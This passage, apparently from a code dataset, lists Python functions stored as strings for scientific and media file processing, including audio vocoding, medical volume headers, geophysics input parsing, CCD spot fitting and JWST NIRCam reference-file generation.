\"w\")\n\n iram = True\n for line in FP.readlines():\n if line.rstrip() == \"@01000000\":\n iram = False\n continue\n if iram:\n IRAM_FP.write(line)\n else:\n DRAM_FP.write(line)\n\n\n FP.close()\n IRAM_FP.close()\n DRAM_FP.close()", "def test_process_mono_file(self):\n test_path = pathlib.Path(__file__).parent.absolute() / 'data/mono.wav'\n self.default_kwargs['input_file'] = test_path\n self.default_kwargs['output_file'] = pathlib.Path(self.temp_file.name)\n self.encoder = FileEncoder(**self.default_kwargs)\n self.encoder.process()", "def main():\r\n\r\n ### Choose and Import File\r\n\r\n inSound = Sound()\r\n\r\n rate = inSound.rate\r\n data = inSound.data\r\n dataLength = len(data)\r\n \r\n info = inSound.get_info()\r\n head, filename = os.path.split(info[0]) # get filename of input\r\n \r\n # Decide output directory and filename\r\n outDir = r'out'\r\n outFile = os.path.join(outDir, 'out_'+filename)\r\n\r\n # Check if data has multiple channels, if yes use only one\r\n if(len(data.shape) > 1):\r\n data = data[:,0]\r\n\r\n\r\n ### Set All Parameters\r\n\r\n #get parameters from user dialogue\r\n params = getParameters()\r\n\r\n numChannels = params['numChannels'][0] # number of Channels\r\n loFreq = params['loFreq'][0] # lower bound on frequencies\r\n hiFreq = params['hiFreq'][0] # upper bound on frequencies\r\n plotChannels = params['plotChannels'][0] # if it should plot the Gammatone channels\r\n block_time = params['block_time'][0] # in ms\r\n block_shift = params['block_shift'][0] # in ms\r\n selectChannels = params['selectChannels'][0] # number of channels to activate at a single time\r\n\r\n\r\n ### Filter input file\r\n\r\n filtered, channel_fs = filterDataGamaTone(data, rate, numChannels, loFreq, hiFreq, plotChannels)\r\n\r\n\r\n ### Gammatones -> Stimulation Amplitude for time block\r\n\r\n samples_in_block = np.floor(block_time * rate / 1000).astype('int')\r\n samples_in_shift = np.floor(block_shift * rate / 1000).astype('int')\r\n\r\n summed = gammatoneToAmplitude(filtered, samples_in_block, samples_in_shift)\r\n\r\n # only activate the n electrodes that have the largest stimulation\r\n amps = n_largest_channels(summed, n=selectChannels)\r\n\r\n \r\n #### Sound reconstruction\r\n\r\n # for each timeblock we need to duplicate enough samples to fill it at sample rate\r\n amps_samples = np.repeat(amps, samples_in_shift, axis=1)\r\n #trim end to get same length as input\r\n amps_samples = amps_samples[:,:dataLength] \r\n\r\n # from amplitude samples and frequencies, reconstruct sound\r\n res_data = generateSound(amps_samples, channel_fs, rate)\r\n\r\n\r\n ### Write to output file\r\n write(outFile, rate, res_data)\r\n print('Wrote file to: \\n' + outFile)", "def generateNHDRHeader(self, inputFile):\r\n\r\n logging.info('Processing started')\r\n #initialize PCR object\r\n imagePCRFile = PCRDataObject()\r\n #import image parameters of PCR object\r\n imagePCRFile.ImportFromFile(inputFile)\r\n\r\n filePathName, fileExtension = os.path.splitext(inputFile)\r\n #The directory of the .nhdr file\r\n nhdrPathName = filePathName + \".nhdr\"\r\n\r\n if fileExtension == \".pcr\":\r\n if imagePCRFile.form == 1 or imagePCRFile.form == 5 or imagePCRFile.form == 10:\r\n with open(nhdrPathName, \"w\") as headerFile:\r\n headerFile.write(\"NRRD0004\\n\")\r\n headerFile.write(\"# Complete NRRD file format specification at:\\n\")\r\n headerFile.write(\"# http://teem.sourceforge.net/nrrd/format.html\\n\")\r\n if imagePCRFile.form == 5:\r\n headerFile.write(\"type: ushort\\n\")\r\n elif imagePCRFile.form == 10:\r\n headerFile.write(\"type: float\\n\")\r\n elif imagePCRFile.form == 1:\r\n headerFile.write(\"type: uchar\\n\")\r\n headerFile.write(\"dimension: 3\\n\")\r\n headerFile.write(\"space: left-posterior-superior\\n\")\r\n sizeX = imagePCRFile.X\r\n sizeY = imagePCRFile.Y\r\n sizeZ = imagePCRFile.Z\r\n headerFile.write(f\"sizes: {sizeX} {sizeY} {sizeZ}\\n\")\r\n volSpace = imagePCRFile.voxelSize\r\n headerFile.write(f\"space directions: ({volSpace}, 0.0, 0.0) (0.0, {volSpace}, 0.0) (0.0, 0.0, {volSpace})\\n\")\r\n headerFile.write(\"kinds: domain domain domain\\n\")\r\n headerFile.write(\"endian: little\\n\")\r\n headerFile.write(\"encoding: raw\\n\")\r\n headerFile.write(\"space origin: (0.0, 0.0, 0.0)\\n\")\r\n volPathName = filePathName + \".vol\"\r\n volPathSplit = []\r\n volPathSplit = volPathName.split('/')\r\n volFileName = volPathSplit[len(volPathSplit)-1]\r\n headerFile.write(f\"data file: {volFileName}\\n\")\r\n # print(imagePCRFile.form)\r\n print(f\".nhdr file path is: {nhdrPathName}\")\r\n #Automatically loading .vol file using the generated .nhdr file.\r\n if os.path.exists(volPathName):\r\n slicer.util.loadVolume(nhdrPathName)\r\n print(f\"{volFileName} loaded\\n\")\r\n else:\r\n print(f\"{volFileName} is not in the same directory\\n\")\r\n else:\r\n print(\"The format of this dataset is currently not supported by this module. Currently only float (format=10), unsigned 16 bit integer (format=5) and unsigned 8 bit integer (format=1) data types are supported. Please contact us with this dataset to enable this data type.\")\r\n else:\r\n print(\"This is not a PCR file, please re-select a PCR file\")", "def processfile(file, out, me):\n if out.endswith('.npz'):\n out = out[:-4]\n out = out + ('-%03d' % me) + '.npz'\n if os.path.exists(out):\n return\n f = QPM.QPMSubsampleFile(file)\n xis = []\n mybf = QPM.LogWindowBiasFunction(edges[me], edges[me + 1])\n mymock = QPM.halomock(f, 1e6, mybf, continuous=False)\n for i in range(me + 1):\n bf = QPM.LogWindowBiasFunction(edges[i], edges[i + 1])\n mock = QPM.halomock(f, 1e6, bf, continuous=False)\n # the error is nonsense since we have just one sample\n # deal with it in combine\n xi = QPM.xi([mock], mocks2=[mymock])\n r = xi[0]\n xis.append(xi[1])\n print edges[i], edges[i + 1], len(mock[0]), mock[1].sum()\n numpy.savez(out, r=r, xi=xis, edges=edges, N=1e6, me=me)", "def readDriverFile(self, input_file):\n\n\n fid = open(self.basePath + input_file,'r')\n\n # Line 1\n line = fid.readline()\n l_input = line.split('!')\n mshfile = l_input[0].rstrip()\n\n # Line 2\n line = fid.readline()\n l_input = line.split('!')\n obsfile = l_input[0].rstrip()\n\n # Line 3\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input=='null':\n topofile = []\n\n else:\n topofile = l_input[0].rstrip()\n\n\n # Line 4\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input[0]=='VALUE':\n mstart = float(l_input[1])\n\n else:\n mstart = l_input[0].rstrip()\n\n # Line 5\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input[0]=='VALUE':\n mref = float(l_input[1])\n\n else:\n mref = l_input[0].rstrip()\n\n # Line 6\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input[0]=='VALUE':\n staticInput = float(l_input[1])\n\n elif l_input[0]=='DEFAULT':\n staticInput = None\n\n else:\n staticInput = l_input[0].rstrip()\n\n\n # Line 7\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input=='DEFAULT':\n magfile = []\n\n else:\n magfile = l_input[0].rstrip()\n\n # Line 8\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input=='DEFAULT':\n wgtfile = []\n\n else:\n wgtfile = l_input[0].rstrip()\n\n # Line 9\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n chi = float(l_input[0])\n\n # Line 10\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n val = np.array(l_input[0:4])\n alphas = val.astype(np.float)\n\n # Line 11\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input[0]=='VALUE':\n val = np.array(l_input[1:3])\n bounds = val.astype(np.float)\n\n else:\n bounds = l_input[0].rstrip()\n\n # Line 12\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input[0]=='VALUE':\n val = np.array(l_input[1:6])\n lpnorms = val.astype(np.float)\n\n else:\n lpnorms = l_input[0].rstrip()\n\n # Line 13\n line = fid.readline()\n l_input = re.split('[!\\s]',line)\n if l_input[0]=='VALUE':\n val = np.array(l_input[1:3])\n eps = val.astype(np.float)\n\n else:\n eps = [None,None]\n\n self.mshfile = mshfile\n self.obsfile = obsfile\n self.topofile = topofile\n self.mstart = mstart\n self._mrefInput = mref\n self._staticInput = staticInput\n self.magfile = magfile\n self.wgtfile = wgtfile\n self.chi = chi\n self.alphas = alphas\n self.bounds = bounds\n self.lpnorms = lpnorms\n self.eps = eps", "def run_vorpastat(self, *options):\n\n args = list(options) + [self._input_file, 'out.meshb']\n self._run_command(\"vorpastat\", args)", "def calc_out_voltage(self, input_photocurrent_file):\n pass", "def vt_send(filename, key):\n url = \"https://www.virustotal.com/vtapi/v2/file/scan\"\n attr = {\"apikey\": key}\n files = {\"file\": open(filename, 'rb')}\n res = requests.post(url, data=attr, files=files)\n\n if res.status_code == 200:\n return res.text\n else:\n return res.text", "def __init__(self, input_file_path, convert_to_bgr=False):\n self.__yuv_video = YuvDecoder(input_file_path, convert_to_bgr=True)\n print('After INSTANTIATION')\n self.__yuv_video.start()", "def generate(inputFilename, outputFilename = defaultFileName, \n sizeOfReducedSample = DEFSIZEOFREDUCEDSAMPLE, \n centerEta = DEFCENTERETA, centerPhi = DEFCENTERPHI): \n listOfSignals = convert(inputFilename)\n arrayOfSignals = np.array(listOfSignals)\n arrayOfSignals.shape\n np.save(outputFilename, arrayOfSignals, allow_pickle=False)\n print(\"npy array name: \",outputFilename)", "def get_vrt_band_list():\n logger.debug('get_vrt_band_list() called')\n vrt_band_list = []\n#===============================================================================\n# sensor_dict = self.bands[tile_type_id][(dataset_info['satellite_tag'], dataset_info['sensor_name'])]\n# # log_multiline(logger.debug, sensor, 'Sensor', '\\t')\n# for file_number in sorted(sensor_dict.keys()):\n# band_info = sensor_dict[file_number]\n# if band_info['level_name'] == 'NBAR':\n# dataset_dir = dataset_info['nbar_dataset_path']\n# dataset_id = dataset_info['nbar_dataset_id']\n# processing_level = dataset_info['nbar_level_name']\n# nodata_value = dataset_info['nbar_nodata_value']\n# resampling_method = dataset_info['nbar_resampling_method']\n# elif band_info['level_name'] == 'ORTHO':\n# dataset_dir = dataset_info['l1t_dataset_path']\n# dataset_id = dataset_info['l1t_dataset_id']\n# processing_level = dataset_info['l1t_level_name']\n# nodata_value = dataset_info['l1t_nodata_value']\n# resampling_method = dataset_info['l1t_resampling_method']\n# else:\n# continue # Ignore any pan-chromatic and derived bands\n# \n# dataset_dir = os.path.join(dataset_dir, 'scene01')\n# filename = find_file(dataset_dir, band_info['file_pattern'])\n# vrt_band_list.append({'file_number': band_info['file_number'], \n# 'filename': filename, \n# 'name': band_info['band_name'],\n# 'dataset_id': dataset_id,\n# 'band_id': band_info['band_id'],\n# 'processing_level': processing_level,\n# 'nodata_value': nodata_value,\n# 'resampling_method': resampling_method,\n# 'tile_layer': band_info['tile_layer']})\n#===============================================================================\n \n #TODO: Make this able to handle multiple derived layers\n for band_level in ['FC']:\n derived_bands = self.bands[tile_type_id][('DERIVED', band_level)]\n for file_number in sorted(derived_bands.keys()):\n band_info = derived_bands[file_number]\n file_pattern = band_info['file_pattern']\n dataset_dir = os.path.join(dataset_info['fc_dataset_path'], 'scene01')\n dataset_id = dataset_info['fc_dataset_id']\n filename = find_file(dataset_dir, file_pattern) \n processing_level = dataset_info['fc_level_name']\n nodata_value = dataset_info['fc_nodata_value'] # Should be None for FC\n resampling_method = dataset_info['fc_resampling_method']\n vrt_band_list.append({'file_number': None, \n 'filename': filename, \n 'name': band_info['band_name'],\n 'dataset_id': dataset_id,\n 'band_id': band_info['band_id'],\n 'processing_level': processing_level,\n 'nodata_value': nodata_value,\n 'resampling_method': resampling_method,\n 'tile_layer': 1})\n \n log_multiline(logger.debug, vrt_band_list, 'vrt_band_list = %s', '\\t')\n return vrt_band_list", "def verb(filename,l,t,d,wout=True): #l = predelay d= decay smaller = less decay, t= number of delays\n#low l turns into chorus\n start=time.time()\n n, data, data_dB,sr,ch=inputwav(filename)\n data_ex=np.zeros(((n+l*t),ch))\n data_ex[0:n,:]=data\n data_Rex=np.zeros((len(data_ex),t,ch))\n print('Applying reverb...')\n for k in range (ch):\n for i in range (len(data)):\n for j in range(t):\n data_Rex[i+l*(j+1),j,k]=data_ex[i,k]*np.exp(-d*(j+1))\n data_F=data_ex\n print('Mixing...')\n for i in range (t):\n data_F=data_F+1*data_Rex[:,i,:]\n data_F=1*data_F\n data_verb=data_F+data_ex\n if wout==True:\n print('Exporting...')\n sf.write(filename[0:len(filename)-4]+'_verbed.wav',data_verb,sr,'PCM_16')\n print('Done!')\n end=time.time()\n elapsed=int(1000*(end-start))\n print('...............................')\n print('Completed in '+str(elapsed)+' milliseconds.')\n return data_verb", "def flow_write(filename,uv,v=None):\n nBands = 2\n\n if v is None:\n assert(uv.ndim == 3)\n assert(uv.shape[2] == 2)\n u = uv[:,:,0]\n v = uv[:,:,1]\n else:\n u = uv\n\n assert(u.shape == v.shape)\n height,width = u.shape\n f = open(filename,'wb')\n # write the header\n f.write(TAG_CHAR)\n np.array(width).astype(np.int32).tofile(f)\n np.array(height).astype(np.int32).tofile(f)\n # arrange into matrix form\n tmp = np.zeros((height, width*nBands))\n tmp[:,np.arange(width)*2] = u\n tmp[:,np.arange(width)*2 + 1] = v\n tmp.astype(np.float32).tofile(f)\n f.close()", "def forwardModel(file, out='Data', wavelength=None, gain=3.1, size=10, burn=500, spotx=2888, spoty=3514, run=700,\n simulation=False, truths=None, blurred=False):\n print '\\n\\n\\n'\n print '_'*120\n print 'Processing:', file\n #get data and convert to electrons\n o = pf.getdata(file)*gain\n\n if simulation:\n data = o\n else:\n #roughly the correct location - to avoid identifying e.g. cosmic rays\n data = o[spoty-(size*3):spoty+(size*3)+1, spotx-(size*3):spotx+(size*3)+1].copy()\n\n #maximum position within the cutout\n y, x = m.maximum_position(data)\n\n #spot and the peak pixel within the spot, this is also the CCD kernel position\n spot = data[y-size:y+size+1, x-size:x+size+1].copy()\n CCDy, CCDx = m.maximum_position(spot)\n print 'CCD Kernel Position (within the postage stamp):', CCDx, CCDy\n\n #bias estimate\n if simulation:\n bias = 9000.\n rn = 4.5\n else:\n bias = np.median(o[spoty-size: spoty+size, spotx-220:spotx-20]) #works for read o\n rn = np.std(o[spoty-size: spoty+size, spotx-220:spotx-20])\n\n print 'Readnoise (e):', rn\n if rn < 2. or rn > 6.:\n print 'NOTE: suspicious readout noise estimate...'\n print 'ADC offset (e):', bias\n\n #remove bias\n spot -= bias\n\n #save to file\n fileIO.writeFITS(spot, out+'small.fits', int=False)\n\n #make a copy ot generate error array\n data = spot.copy().flatten()\n #assume that uncertanties scale as sqrt of the values + readnoise\n #sigma = np.sqrt(data/gain + rn**2)\n tmp = data.copy()\n tmp[tmp + rn**2 < 0.] = 0. #set highly negative values to zero\n var = tmp.copy() + rn**2\n #Gary B. said that actually this should be from the model or is biased,\n #so I only pass the readout noise part now\n\n #fit a simple model\n print 'Least Squares Fitting...'\n gaus = models.Gaussian2D(spot.max(), size, size, x_stddev=0.5, y_stddev=0.5)\n gaus.theta.fixed = True #fix angle\n p_init = gaus\n fit_p = fitting.LevMarLSQFitter()\n stopy, stopx = spot.shape\n X, Y = np.meshgrid(np.arange(0, stopx, 1), np.arange(0, stopy, 1))\n p = fit_p(p_init, X, Y, spot)\n print p\n model = p(X, Y)\n fileIO.writeFITS(model, out+'BasicModel.fits', int=False)\n fileIO.writeFITS(model - spot, out+'BasicModelResidual.fits', int=False)\n\n #goodness of fit\n gof = (1./(np.size(data) - 5.)) * np.sum((model.flatten() - data)**2 / var)\n print 'GoF:', gof\n print 'Done\\n\\n'\n\n #maximum value\n max = np.max(spot)\n peakrange = (0.9*max, 1.7*max)\n sum = np.sum(spot)\n\n print 'Maximum Value:', max\n print 'Sum of the values:', sum\n print 'Peak Range:', peakrange\n\n #MCMC based fitting\n print 'Bayesian Model Fitting...'\n nwalkers = 1000\n\n # Initialize the sampler with the chosen specs.\n #Create the coordinates x and y\n x = np.arange(0, spot.shape[1])\n y = np.arange(0, spot.shape[0])\n #Put the coordinates in a mesh\n xx, yy = np.meshgrid(x, y)\n\n #Flatten the arrays\n xx = xx.flatten()\n yy = yy.flatten()\n\n print 'Fitting full model...'\n ndim = 7\n\n #Choose an initial set of positions for the walkers - fairly large area not to bias the results\n p0 = np.zeros((nwalkers, ndim))\n #peak, center_x, center_y, radius, focus, width_x, width_y = theta\n p0[:, 0] = np.random.normal(max, max/100., size=nwalkers) # peak value\n p0[:, 1] = np.random.normal(p.x_mean.value, 0.1, size=nwalkers) # x\n p0[:, 2] = np.random.normal(p.y_mean.value, 0.1, size=nwalkers) # y\n\n if wavelength is None:\n if blurred:\n print 'Using initial guess [radius, focus, width_x, width_y]:', [0.5, 1., 0.3, 0.3]\n p0[:, 3] = np.random.normal(0.5, 0.01, size=nwalkers) # radius\n p0[:, 4] = np.random.normal(1., 0.01, size=nwalkers) # focus\n p0[:, 5] = np.random.normal(0.3, 0.01, size=nwalkers) # width_x\n p0[:, 6] = np.random.normal(0.3, 0.01, size=nwalkers) # width_y\n else:\n p0[:, 3] = np.random.uniform(.45, 0.55, size=nwalkers) # radius\n p0[:, 4] = np.random.uniform(.40, 0.45, size=nwalkers) # focus\n p0[:, 5] = np.random.uniform(.35, 0.45, size=nwalkers) # width_x\n p0[:, 6] = np.random.uniform(.35, 0.45, size=nwalkers) # width_y\n else:\n tmp = _expectedValues()[wavelength]\n if blurred:\n print 'Using initial guess [radius, focus, width_x, width_y]:', [tmp[0], 0.9, tmp[2], tmp[3]]\n p0[:, 3] = np.random.normal(tmp[0], 0.01, size=nwalkers) # radius\n p0[:, 4] = np.random.normal(0.9, 0.01, size=nwalkers) # focus\n p0[:, 5] = np.random.normal(tmp[2], 0.01, size=nwalkers) # width_x\n p0[:, 6] = np.random.normal(tmp[3], 0.01, size=nwalkers) # width_y\n else:\n print 'Using initial guess [radius, focus, width_x, width_y]:', tmp\n p0[:, 3] = np.random.normal(tmp[0], 0.01, size=nwalkers) # radius\n p0[:, 4] = np.random.normal(tmp[1], 0.01, size=nwalkers) # focus\n p0[:, 5] = np.random.normal(tmp[2], 0.01, size=nwalkers) # width_x\n p0[:, 6] = np.random.normal(tmp[3], 0.01, size=nwalkers) # width_y\n\n #initiate sampler\n pool = Pool(cores) #A hack Dan gave me to not have ghost processes running as with threads keyword\n #sampler = emcee.EnsembleSampler(nwalkers, ndim, log_posterior, args=[xx, yy, data, var, peakrange, spot.shape],\n sampler = emcee.EnsembleSampler(nwalkers, ndim, log_posterior,\n args=[xx, yy, data, rn**2, peakrange, spot.shape, blurred],\n pool=pool)\n\n # Run a burn-in and set new starting position\n print \"Burning-in...\"\n pos, prob, state = sampler.run_mcmc(p0, burn)\n best_pos = sampler.flatchain[sampler.flatlnprobability.argmax()]\n print best_pos\n print \"Mean acceptance fraction:\", np.mean(sampler.acceptance_fraction)\n pos = emcee.utils.sample_ball(best_pos, best_pos/100., size=nwalkers)\n sampler.reset()\n\n print \"Running an improved estimate...\"\n pos, prob, state = sampler.run_mcmc(pos, burn)\n print \"Mean acceptance fraction:\", np.mean(sampler.acceptance_fraction)\n sampler.reset()\n print \"Running MCMC...\"\n pos, prob, state = sampler.run_mcmc(pos, run, rstate0=state)\n print \"Mean acceptance fraction:\", np.mean(sampler.acceptance_fraction)\n\n #Get the index with the highest probability\n maxprob_index = np.argmax(prob)\n\n #Get the best parameters and their respective errors and print best fits\n params_fit = pos[maxprob_index]\n errors_fit = [sampler.flatchain[:,i].std() for i in xrange(ndim)]\n amplitudeE, center_xE, center_yE, radiusE, focusE, width_xE, width_yE = errors_fit\n _printResults(params_fit, errors_fit)\n\n #Best fit model\n peak, center_x, center_y, radius, focus, width_x, width_y = params_fit\n amplitude = _amplitudeFromPeak(peak, center_x, center_y, radius, x_0=CCDx, y_0=CCDy)\n airy = models.AiryDisk2D(amplitude, center_x, center_y, radius)\n adata = airy.eval(xx, yy, amplitude, center_x, center_y, radius).reshape(spot.shape)\n f = models.Gaussian2D(1., center_x, center_y, focus, focus, 0.)\n focusdata = f.eval(xx, yy, 1., center_x, center_y, focus, focus, 0.).reshape(spot.shape)\n foc = signal.convolve2d(adata, focusdata, mode='same')\n CCD = models.Gaussian2D(1., CCDx, CCDy, width_x, width_y, 0.)\n CCDdata = CCD.eval(xx, yy, 1., CCDx, CCDy, width_x, width_y, 0.).reshape(spot.shape)\n model = signal.convolve2d(foc, CCDdata, mode='same')\n #save model\n fileIO.writeFITS(model, out+'model.fits', int=False)\n\n #residuals\n fileIO.writeFITS(model - spot, out+'residual.fits', int=False)\n fileIO.writeFITS(((model - spot)**2 / var.reshape(spot.shape)), out+'residualSQ.fits', int=False)\n\n # a simple goodness of fit\n gof = (1./(np.size(data) - ndim)) * np.sum((model.flatten() - data)**2 / var)\n maxdiff = np.max(np.abs(model - spot))\n print 'GoF:', gof, ' Maximum difference:', maxdiff\n if maxdiff > 2e3 or gof > 4.:\n print '\\nFIT UNLIKELY TO BE GOOD...\\n'\n print 'Amplitude estimate:', amplitude\n\n #results and save results\n _printFWHM(width_x, width_y, errors_fit[5], errors_fit[6])\n res = dict(wx=width_x, wy=width_y, wxerr=width_xE, wyerr=width_yE, out=out,\n peakvalue=max, CCDmodel=CCD, CCDmodeldata=CCDdata, GoF=gof,\n maximumdiff=maxdiff, fit=params_fit)\n fileIO.cPickleDumpDictionary(res, out+'.pkl')\n\n #plot\n samples = sampler.chain.reshape((-1, ndim))\n extents = None\n if simulation:\n extents = [(0.91*truth, 1.09*truth) for truth in truths]\n extents[1] = (truths[1]*0.995, truths[1]*1.005)\n extents[2] = (truths[2]*0.995, truths[2]*1.005)\n extents[3] = (0.395, 0.425)\n extents[4] = (0.503, 0.517)\n truths[0] = _peakFromTruth(truths)\n print truths\n fig = triangle.corner(samples,\n labels=['peak', 'x', 'y', 'radius', 'focus', 'width_x', 'width_y'],\n truths=truths)#, extents=extents)\n fig.savefig(out+'Triangle.png')\n plt.close()\n pool.close()", "def generate_siaf_pre_flight_reference_files_nircam():\n\n instrument = 'NIRCam'\n overwrite_wedge_file = False\n overwrite_grism_file = False\n\n\n # wedge definitions\n wedge_file = os.path.join(JWST_SOURCE_DATA_ROOT, instrument,\n '{}_siaf_wedge_offsets.txt'.format(instrument.lower()))\n\n if (not os.path.isfile(wedge_file) or (overwrite_wedge_file)):\n\n wedge_offsets = Table.read(os.path.join(JWST_SOURCE_DATA_ROOT, instrument, 'wedge_offsets.txt'), format='ascii.basic', delimiter=' ', guess=False)\n\n comments = []\n comments.append('{} detector parameter definition file for SIAF'.format(instrument))\n comments.append('')\n comments.append('This file contains the wedge offsets.')\n comments.append('')\n comments.append('Generated {} {}'.format(timestamp.isot, timestamp.scale))\n comments.append('by {}'.format(username))\n comments.append('')\n wedge_offsets.meta['comments'] = comments\n wedge_offsets.write(wedge_file, format='ascii.fixed_width', delimiter=',',\n delimiter_pad=' ', bookend=False)\n\n # grism definitions\n grism_file = os.path.join(JWST_SOURCE_DATA_ROOT, instrument,\n '{}_siaf_grism_parameters.txt'.format(instrument.lower()))\n\n if (not os.path.isfile(wedge_file) or (overwrite_grism_file)):\n # grism parameters, see WFSS worksheet in EXCEL SIAF\n grism_parameters = Table.read(grism_file, format='ascii.basic', delimiter=',', guess=False)\n\n # Save a backup copy of the grism file\n cmd = 'cp {} {}'.format(grism_file,os.path.join(JWST_TEMPORARY_DATA_ROOT, instrument, 'nircam_siaf_grism_parameters_backup.txt'))\n os.system(cmd)\n\n # different sign in Y for NRCB apertures\n factor = np.array(\n [1. if 'NRCA' in grism_parameters['aperture_name'][i] else -1. for i in range(len(grism_parameters))])\n\n for col in grism_parameters.colnames[1:]:\n # these are Sci coordinates\n if col[0] != 'D':\n if 'X' in col:\n grism_parameters['D{}'.format(col)] = grism_parameters[col].data - 1024.5\n elif 'Y' in col:\n grism_parameters['D{}'.format(col)] = factor * (grism_parameters[col].data - 1024.5)\n\n\n\n comments = []\n comments.append('{} grism parameter definition file for SIAF'.format(instrument))\n comments.append('')\n comments.append('This file contains the grism parameters.')\n comments.append('')\n comments.append('Generated {} {}'.format(timestamp.isot, timestamp.scale))\n comments.append('by {}'.format(username))\n comments.append('')\n grism_parameters.meta['comments'] = comments\n grism_parameters.write(grism_file, format='ascii.fixed_width', delimiter=',',\n delimiter_pad=' ', bookend=False)\n\n # Transformation parameters, mapping used to select rows in cold_fit_[] file\n coldfit_name_mapping = {\n 'NRCA1_FULL': {'degrees_to_mm':'OTESKYToNIRCAMASW_201609161431',\n 'mm_to_pixels':'NIRCAMASWToNIRCAMASW_1_20161025081540',\n 'pixels_to_mm':'NIRCAMASW_1ToNIRCAMASW_20161025081540',\n 'mm_to_degrees':'NIRCAMASWoOTESKY_201609161431',\n },\n 'NRCA2_FULL': {'degrees_to_mm':'OTESKYToNIRCAMASW_201609161431',\n 'mm_to_pixels':'NIRCAMASWToNIRCAMASW_2_20161025081547',\n 'pixels_to_mm':'NIRCAMASW_2ToNIRCAMASW_20161025081547',\n 'mm_to_degrees':'NIRCAMASWoOTESKY_201609161431',\n },\n 'NRCA3_FULL': {'degrees_to_mm':'OTESKYToNIRCAMASW_201609161431',\n 'mm_to_pixels':'NIRCAMASWToNIRCAMASW_3_20161025081552',\n 'pixels_to_mm':'NIRCAMASW_3ToNIRCAMASW_20161025081552',\n 'mm_to_degrees':'NIRCAMASWoOTESKY_201609161431',\n },\n 'NRCA4_FULL': {'degrees_to_mm':'OTESKYToNIRCAMASW_201609161431',\n 'mm_to_pixels':'NIRCAMASWToNIRCAMASW_4_20161025081557',\n 'pixels_to_mm':'NIRCAMASW_4ToNIRCAMASW_20161025081557',\n 'mm_to_degrees':'NIRCAMASWoOTESKY_201609161431',\n },\n 'NRCA5_FULL' :{'degrees_to_mm':'OTESKYToNIRCAMALW_RT_20170307121022',\n 'mm_to_pixels':'NIRCAMALWToNIRCAMALW_1_20161227162042',\n 'pixels_to_mm':'NIRCAMALW_1ToNIRCAMALW_20161227162042',\n 'mm_to_degrees':'NIRCAMALWToOTESKY_RT_20170307121022',\n },\n 'NRCB1_FULL': {'degrees_to_mm':'OTESKYToNIRCAMBSW_RT_20170307121023',\n 'mm_to_pixels':'NIRCAMBSWToNIRCAMBSW_1_20161025081604',\n 'pixels_to_mm':'NIRCAMBSW_1ToNIRCAMBSW_20161025081604',\n 'mm_to_degrees':'NIRCAMBSWToOTESKY_RT_20170307121024',\n },\n 'NRCB2_FULL': {'degrees_to_mm':'OTESKYToNIRCAMBSW_RT_20170307121023',\n 'mm_to_pixels':'NIRCAMBSWToNIRCAMBSW_2_20161025081912',\n 'pixels_to_mm':'NIRCAMBSW_2ToNIRCAMBSW_20161025081912',\n 'mm_to_degrees':'NIRCAMBSWToOTESKY_RT_20170307121024',\n },\n 'NRCB3_FULL': {'degrees_to_mm':'OTESKYToNIRCAMBSW_RT_20170307121023',\n 'mm_to_pixels':'NIRCAMBSWToNIRCAMBSW_3_20161025082300',\n 'pixels_to_mm':'NIRCAMBSW_3ToNIRCAMBSW_20161025082300',\n 'mm_to_degrees':'NIRCAMBSWToOTESKY_RT_20170307121024',\n },\n 'NRCB4_FULL': {'degrees_to_mm':'OTESKYToNIRCAMBSW_RT_20170307121023',\n 'mm_to_pixels':'NIRCAMBSWToNIRCAMBSW_4_20161025082647',\n 'pixels_to_mm':'NIRCAMBSW_4ToNIRCAMBSW_20161025082647',\n 'mm_to_degrees':'NIRCAMBSWToOTESKY_RT_20170307121024',\n },\n 'NRCB5_FULL' :{'degrees_to_mm':'OTESKYToNIRCAMBLW_RT_20170307121023',\n 'mm_to_pixels':'NIRCAMBLWToNIRCAMBLW_1_20161227162336',\n 'pixels_to_mm':'NIRCAMBLW_1ToNIRCAMBLW_20161227162336',\n 'mm_to_degrees':'NIRCAMBLWToOTESKY_RT_20170307121023',\n },\n 'NRCA1_FULL_WEDGE_RND' :{'degrees_to_mm':'OTESKYToNIRCAMASW_RNDNC_202110261138',\n 'mm_to_pixels':'NIRCAMASWToNIRCAMASW_1_20161025081540',\n 'pixels_to_mm':'NIRCAMASW_1ToNIRCAMASW_20161025081540',\n 'mm_to_degrees':'NIRCAMASW_RNDNCToOTESKY_202110261138',\n },\n 'NRCA2_FULL_WEDGE_RND' :{'degrees_to_mm':'OTESKYToNIRCAMASW_RND_202005150434',\n 'mm_to_pixels':'NIRCAMASWToNIRCAMASW_2_20161025081547',\n 'pixels_to_mm':'NIRCAMASW_2ToNIRCAMASW_20161025081547',\n 'mm_to_degrees':'NIRCAMASW_RNDToOTESKY_202005150434',\n },\n 'NRCA3_FULL_WEDGE_RND' :{'degrees_to_mm':'OTESKYToNIRCAMASW_RNDNC_202110261138',\n 'mm_to_pixels':'NIRCAMASWToNIRCAMASW_3_20161025081552',\n 'pixels_to_mm':'NIRCAMASW_3ToNIRCAMASW_20161025081552',\n 'mm_to_degrees':'NIRCAMASW_RNDNCToOTESKY_202110261138',\n },\n 'NRCA4_FULL_WEDGE_RND' :{'degrees_to_mm':'OTESKYToNIRCAMASW_RND_202005150434',\n 'mm_to_pixels':'NIRCAMASWToNIRCAMASW_4_20161025081557',\n 'pixels_to_mm':'NIRCAMASW_4ToNIRCAMASW_20161025081557',\n 'mm_to_degrees':'NIRCAMASW_RNDToOTESKY_202005150434',\n },\n 'NRCA1_FULL_WEDGE_BAR' :{'degrees_to_mm':'OTESKYToNIRCAMASW_BARNC_202110261138',\n 'mm_to_pixels':'NIRCAMASWToNIRCAMASW_1_20161025081540',\n 'pixels_to_mm':'NIRCAMASW_1ToNIRCAMASW_20161025081540',\n 'mm_to_degrees':'NIRCAMASW_BARNCToOTESKY_202110261138',\n },\n 'NRCA2_FULL_WEDGE_BAR' :{'degrees_to_mm':'OTESKYToNIRCAMASW_BAR_202005150434',\n 